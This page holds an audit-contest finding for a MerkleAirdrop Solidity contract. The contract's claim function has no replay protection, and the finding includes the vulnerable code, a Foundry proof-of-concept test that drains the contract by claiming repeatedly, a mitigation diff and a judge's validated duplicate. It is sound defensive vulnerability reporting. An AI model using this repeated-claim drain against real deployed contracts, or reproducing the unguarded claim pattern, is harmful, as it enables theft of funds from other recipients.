AirDropper

AI First Flight #5

Beginner FriendlyDeFiFoundry

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

MerkleAirdrop::claim has no replay protection, allowing any eligible address to drain the entire contract balance

cybervikink

Root + Impact

MerkleAirdrop::claim is intended to be called once per eligible address. A caller provides their address, the airdrop amount they are entitled to, and a merkle proof. If the proof is valid and the correct fee is paid, the contract transfers the USDC allocation to the caller.

Description

The issue

There is no mapping to record whether an address has already claimed. The contract verifies the merkle proof correctly, but after a successful verification it unconditionally transfers tokens without ever marking the address as having claimed. Because the proof remains valid indefinitely, the same address can call claim() as many times as they like, receiving amount tokens on every call until the contract is drained.

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

emit Claimed(account, amount);

// @> No hasClaimed check before transfer — repeatable indefinitely

i_airdropToken.safeTransfer(account, amount);

// @> No hasClaimed[account] = true after transfer

}

Risk

Likelihood:

Any of the 4 eligible addresses discovers this after deployment and calls claim() in a loop
A bot monitoring the mempool detects the first successful claim transaction and immediately replicates it before other users claim

Impact:

All 100 USDC in the contract is drained by a single eligible address, leaving the other 3 recipients with nothing
The cost to drain is trivial: each repeated call costs only 1e9 wei (1 Gwei) in fees, while each call yields 25e6 USDC — the attacker profits enormously per iteration

Proof of Concept

Add this test to test/MerkleAirdropTest.t.sol and run forge test --match-test test_ReplayDrainsContract -vvv:

function test_ReplayDrainsContract() public {

// Fund collectorOne with enough ETH for 4 claim calls

vm.deal(collectorOne, airdrop.getFee() * 4);

uint256 contractBalanceBefore = token.balanceOf(address(airdrop));

uint256 attackerBalanceBefore = token.balanceOf(collectorOne);

vm.startPrank(collectorOne);

// First claim — legitimate

airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);

// Second claim — replay: same proof, same amount, no revert

airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);

// Third claim — draining further

airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);

// Fourth claim — full drain (contract now empty)

airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof);

vm.stopPrank();

uint256 contractBalanceAfter = token.balanceOf(address(airdrop));

uint256 attackerBalanceAfter = token.balanceOf(collectorOne);

// Contract is fully drained

assertEq(contractBalanceAfter, 0);

// Attacker received all 4 allocations (100 USDC total)

assertEq(attackerBalanceAfter - attackerBalanceBefore, amountToSend);

// Contract started with 100 USDC, all gone

assertEq(contractBalanceBefore, amountToSend);

}

Recommended Mitigation

+ mapping(address => bool) private s_hasClaimed;

+ error MerkleAirdrop__AlreadyClaimed();

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

+ if (s_hasClaimed[account]) {

+ revert MerkleAirdrop__AlreadyClaimed();

+ }

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

+ s_hasClaimed[account] = true;

emit Claimed(account, amount);

i_airdropToken.safeTransfer(account, amount);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 23 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Eligible users can claim their airdrop amounts over and over again, draining the contract

## Description A user eligible for the airdrop can verify themselves as being part of the merkle tree and claim their airdrop amount. However, there is no mechanism enabled to track the users who have already claimed their airdrop, and the merkle tree is still composed of the same user. This allows users to drain the `MerkleAirdrop` contract by calling the `MerkleAirdrop::claim()` function over and over again. ## Impact **Severity: High**<br/>**Likelihood: High** A malicious user can call the `MerkleAirdrop::claim()` function over and over again until the contract is drained of all its funds. This also means that other users won't be able to claim their airdrop amounts. ## Proof of Code Add the following test to `./test/MerkleAirdrop.t.sol`, ```javascript function testClaimAirdropOverAndOverAgain() public { vm.deal(collectorOne, airdrop.getFee() * 4); for (uint8 i = 0; i < 4; i++) { vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } assertEq(token.balanceOf(collectorOne), 100e6); } ``` The test passes, and the malicious user has drained the contract of all its funds. ## Recommended Mitigation Use a mapping to store the addresses that have claimed their airdrop amounts. Check and update this mapping each time a user tries to claim their airdrop amount. ```diff contract MerkleAirdrop is Ownable { using SafeERC20 for IERC20; error MerkleAirdrop__InvalidFeeAmount(); error MerkleAirdrop__InvalidProof(); error MerkleAirdrop__TransferFailed(); + error MerkleAirdrop__AlreadyClaimed(); uint256 private constant FEE = 1e9; IERC20 private immutable i_airdropToken; bytes32 private immutable i_merkleRoot; + mapping(address user => bool claimed) private s_hasClaimed; ... function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable { + if (s_hasClaimed[account]) revert MerkleAirdrop__AlreadyClaimed(); if (msg.value != FEE) { revert MerkleAirdrop__InvalidFeeAmount(); } bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert MerkleAirdrop__InvalidProof(); } + s_hasClaimed[account] = true; emit Claimed(account, amount); i_airdropToken.safeTransfer(account, amount); } ``` Now, let's unit test the changes, ```javascript function testCannotClaimAirdropMoreThanOnceAnymore() public { vm.deal(collectorOne, airdrop.getFee() * 2); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } ``` The test correctly fails, with the following logs, ```shell Failing tests: Encountered 1 failing test in test/MerkleAirdropTest.t.sol:MerkleAirdropTest [FAIL. Reason: MerkleAirdrop__AlreadyClaimed()] testCannotClaimAirdropMoreThanOnceAnymore() (gas: 96751) ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!